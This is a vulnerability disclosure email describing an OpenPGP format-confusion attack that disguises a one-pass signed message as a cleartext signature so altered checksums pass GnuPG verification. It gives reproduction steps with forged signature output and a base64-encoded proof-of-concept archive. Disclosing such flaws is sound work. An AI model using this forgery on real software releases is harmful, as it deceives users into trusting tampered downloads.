Untitled

7 min read Original article ↗
Dear security teams, this email is to inform you about a vulnerability in your software implementations. Please note the disclosure timeline at the end of this email. Please acknowledge receipt to confirm that this message has reached you. --- # OpenPGP Cleartext Signature Framework Susceptible to Format Confusion An attacker can exploit ambiguous *OpenPGP* format syntax to deceive users into misinterpreting an ASCII-armored [One-Pass Signed Message](https://www.rfc-editor.org/rfc/rfc9580.html#name-openpgp-messages) as a [Cleartext Signature Framework](https://www.rfc-editor.org/rfc/rfc9580.html#section-7) message through a malformed header. ## Impact This format confusion enables substitution of the original signed data with malicious content while retaining a seemingly valid cryptographic verification. Users and automated checks may unknowingly accept altered or spoofed payloads as authentic, because popular PGP implementations, such as *GnuPG*, default to not explicitly displaying the actual data bound by the signature during validation. Despite [documented issues](https://www.rfc-editor.org/rfc/rfc9580.html#name-issues-with-the-cleartext-s) with the *Cleartext Signature Framework* and *GnuPG* [recommending against it](https://www.gnupg.org/documentation/manuals/gnupg/Operational-GPG-Commands.html#:~:text=It%20is%20suggested%20to%20avoid%20cleartext%20signatures%20in%20favor%20of%20detached%20signatures.), usage of cleartext signatures remains prevalent. The attack necessitates a valid *OpenPGP* signature applied to known, but non-chosen, arbitrary data. ## Details The attack is to disguise a [One-Pass Signed Message](https://www.rfc-editor.org/rfc/rfc9580.html#name-openpgp-messages) (e.g. created through `gpg --sign`) as a [Cleartext Signature Framework](https://www.rfc-editor.org/rfc/rfc9580.html#name-cleartext-signature-framewo) message (`gpg --clearsign`) The [RFC 9580](https://www.rfc-editor.org/rfc/rfc9580.html) mandates, that a *One-Pass Signed Message* encompasses the following packets: - a [One-Pass Signature Packet](https://www.rfc-editor.org/rfc/rfc9580.html#name-one-pass-signature-packet-t): Unprotected metadata, including: - Hash algorithm, - Public key algorithm, - Short key-id of the signing key. - a [Literal Data Packet](https://www.rfc-editor.org/rfc/rfc9580.html#name-literal-data-packet-type-id): The signed data. - a [Signature Packet](https://www.rfc-editor.org/rfc/rfc9580.html#name-signature-packet-type-id-2): A binding between some public key and some data. Any *OpenPGP* signature format containing a valid [Signature Packet](https://www.rfc-editor.org/rfc/rfc9580.html#name-signature-packet-type-id-2) alongside the signed data, such as the [Cleartext Signature Framework](https://www.rfc-editor.org/rfc/rfc9580.html#name-cleartext-signature-framewo), can be converted to a [One-Pass Signed Message](https://www.rfc-editor.org/rfc/rfc9580.html#name-openpgp-messages) through: - forgery of a [One-Pass Signature Packet](https://www.rfc-editor.org/rfc/rfc9580.html#name-one-pass-signature-packet-t) (contains no cryptographically protected contents), and - encoding of the signed data in a [Literal Data Packet](https://www.rfc-editor.org/rfc/rfc9580.html#name-literal-data-packet-type-id), and - copying the [Signature Packet](https://www.rfc-editor.org/rfc/rfc9580.html#name-signature-packet-type-id-2). Since the conversion preserves both the signed data and the signature, cryptographic integrity remains intact. Keying material - neither private nor public - is not required to conduct the conversion, and a *Python* script for this procedure is provided in the appendix as a proof of concept. The attack leverages the ambiguity of the [OpenPGP Armor Header Line](https://www.rfc-editor.org/rfc/rfc9580.html#name-armor-header-line), which allows a [One-Pass Signed Message](https://www.rfc-editor.org/rfc/rfc9580.html#name-openpgp-messages) to be wrapped by `BEGIN PGP MESSAGE` or `BEGIN PGP SIGNATURE`. Additionally, the *OpenPGP* specifically does not mandate a particular handling of non-whitespace characters preceding or following an ASCII-armored *OpenPGP* message. A recipient of an OpenPGP signature might be deceived by an adversary through a malformed [Armor Header Line](https://www.rfc-editor.org/rfc/rfc9580.html#name-armor-header-line) into incorrectly assuming the [Cleartext Signature Framework](https://www.rfc-editor.org/rfc/rfc9580.html#name-cleartext-signature-framewo) was used. This allows for stuffing arbitrary data, that the user incorrectly believes to be signed. The *OpenPGP* specifically does not mandate a particular handling of non-whitespace characters preceding or following an ASCII-armored *OpenPGP* message. Common OpenPGP implementations silently discard any superfluous data preceding the [One-Pass Signed Message](https://www.rfc-editor.org/rfc/rfc9580.html#name-openpgp-messages) including malformed [Armor Header Lines](https://www.rfc-editor.org/rfc/rfc9580.html#name-armor-header-line). The [One-Pass Signed Message](https://www.rfc-editor.org/rfc/rfc9580.html#name-openpgp-messages) subsequently passes cryptographic validation. By default *GnuPG* does not output the signed data during validation, which further helps in deceiving the user. ### Detailed steps to reproduce #### Scenario Alice wants to transmit a file (`UwUntu.iso`) to Bob. Alice wants to assert her authorship and prevent manipulations to the file. Alice has created an OpenPGP keypair and securely transferred her public key to Bob. Mallory is a threat actor able to intercept and manipulate communications between Alice and Bob. Her goal is to replace the legitimate file (`UwUntu.iso`) through her malicious one (`EnterpriseLinux.iso`) while seemingly preserving valid cryptographic verification. `UwUntu.iso` and `EnterpriseLinux.iso` differ in their contents and thus their SHA256 checksums. Mallory possesses neither private nor public keying material used by Alice. Mallory did not interfere with the initial key exchange between Alice and Bob. #### Procedure Alice decides to clearsign the *SHA256* checksum of `UwUntu.iso`: `sha256sum --status UwUntu.iso --tag | gpg --clearsign --local-user alice@example.org --armor | tee UwUntu.iso-CHECKSUM` ``` -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 SHA256 (UwUntu.iso) = e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 -----BEGIN PGP SIGNATURE----- iHUEARYKAB0WIQToHhAB/IMVCMWsfO8A2ANj0QlJcwUCaGqR4AAKCRAA2ANj0QlJ c0I9AP4qiHxx+D90OGDEGFcdSkjiUSD/fLhlYoVDiHhnPSzHbwEAuyUxrYYg23kA VHK9nCInS1fNKbWo8NiedYVOXnISOgs= =a6YF -----END PGP SIGNATURE----- ``` Alice then starts transmission of `UwUntu.iso` and `UwUntu.iso-CHECKSUM` to Bob. Mallory intercepts this transmission. She then converts the [Cleartext Signature](https://www.rfc-editor.org/rfc/rfc9580.html#name-cleartext-signature-framewo) to a [One-Pass Signed Message](https://www.rfc-editor.org/rfc/rfc9580.html#name-openpgp-messages), that she disguises as a [Cleartext Signature](https://www.rfc-editor.org/rfc/rfc9580.html#name-cleartext-signature-framewo): ```shell $ python fake-signature/main.py ./UwUntu.iso-CHECKSUM /dev/stdout -----BEGIN PGP SIGNED MESSAGE------ Hash: SHA512 -----BEGIN PGP SIGNATURE----- kA0DAQoWANgDY9EJSXMBrFx0AGhqkeBTSEEyNTYgKFV3VW50dS5pc28pID0gZTNi MGM0NDI5OGZjMWMxNDlhZmJmNGM4OTk2ZmI5MjQyN2FlNDFlNDY0OWI5MzRjYTQ5 NTk5MWI3ODUyYjg1NYh1BAEWCgAdFiEE6B4QAfyDFQjFrHzvANgDY9EJSXMFAmhq keAACgkQANgDY9EJSXNCPQD+Koh8cfg/dDhgxBhXHUpI4lEg/3y4ZWKFQ4h4Zz0s x28BALslMa2GINt5AFRyvZwiJ0tXzSm1qPDYnnWFTl5yEjoL =//2u -----END PGP SIGNATURE----- ``` Mallory replaces `` with the checksum tag of her malicious `EnterpriseLinux.iso`: ``` -----BEGIN PGP SIGNED MESSAGE------ Hash: SHA512 SHA256 (UwUntu.iso) = 62545c1551bcc06a72163775203d9163f46e47930cd024b4df270afa11a57ba9 -----BEGIN PGP SIGNATURE----- kA0DAQoWANgDY9EJSXMBrFx0AGhqkeBTSEEyNTYgKFV3VW50dS5pc28pID0gZTNi MGM0NDI5OGZjMWMxNDlhZmJmNGM4OTk2ZmI5MjQyN2FlNDFlNDY0OWI5MzRjYTQ5 NTk5MWI3ODUyYjg1NYh1BAEWCgAdFiEE6B4QAfyDFQjFrHzvANgDY9EJSXMFAmhq keAACgkQANgDY9EJSXNCPQD+Koh8cfg/dDhgxBhXHUpI4lEg/3y4ZWKFQ4h4Zz0s x28BALslMa2GINt5AFRyvZwiJ0tXzSm1qPDYnnWFTl5yEjoL =//2u -----END PGP SIGNATURE----- ``` Mallory replaces the contents of `UwUntu.iso` with those of `EnterpriseLinux.iso`. Having modified both `UwUntu.iso` and the signature `UwUntu.iso-CHECKSUM`, Mallory forwards the files to Bob. Bob verifies the signature: ```shell $ cat ./UwUntu.iso-CHECKSUM | gpg --verify gpg: Signature made Sun Jul 6 17:10:24 2025 CEST gpg: using EDDSA key E81E1001FC831508C5AC7CEF00D80363D1094973 gpg: Good signature from "Alice " [ultimate] ``` Confident over the legitimacy of `UwUntu.iso-CHECKSUM`, Bob verifies, that `UwUntu.iso` actually matches `UwUntu.iso-CHECKSUM`: `sha256sum --check UwUntu.iso-CHECKSUM` ``` UwUntu.iso: OK ``` Mallory's attack succeeded, as she deceived Bob into believing the manipulated `UwUntu.iso` to be cryptographically signed by Alice. The verification process involving cleartext signatures and SHA256 checksums is utilized by multiple well-known software distributions and exists beyond the scope of this theoretical example. ## Recommendations Removal of the Cleartext Signature Framework from the *OpenPGP* standard helps resolve the [issues with the Cleartext Signature Framework](https://www.rfc-editor.org/rfc/rfc9580.html#name-issues-with-the-cleartext-s). Furthermore, deprecation allows for a graceful phase-out. *OpenPGP* users should avoid using cleartext signatures, as is also recommended by *GnuPG*. To prevent confusion about the actual signed data, *OpenPGP* implementations should output the data bound by the signature during validation by default. *sequoia-sq* does so. *GnuPG* does not and requires the `--output` option to be set. When working with *OpenPGP* signatures in general, users should instruct their PGP implementation to output the signed data and only use this output for any further or related tasks. ## Credits - Finder credits: 49016 - PoC & writeup: 49016, Fl�pke, Sivizius, Liam ## Appendix ### fake-signature.tar.xz.b64 ``` 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 yi0RscRn+wIAAAAABFla ``` --- Disclosure Timeline: - 21.10.2025: Submission of initial version of this report. Upcoming Timeline: - 24.10.2025: Submission of a talk for 39th Chaos Communication Congress (39C3). No technical details shared. - 21.12.2025: Disclosure of this report on https://seclists.org/fulldisclosure/ - 26-31.12.2025: If accepted by content team, 39C3 Congress talk regarding this report Please note: While we might be able to offer some flexibility, our plan is to adhere to the above stated upcoming timeline, regardless of the availability of patches or fixes. We kindly request allocation of a CVE number to track this issue. Please keep us updated regarding your remediation efforts. Thank you Best, Liam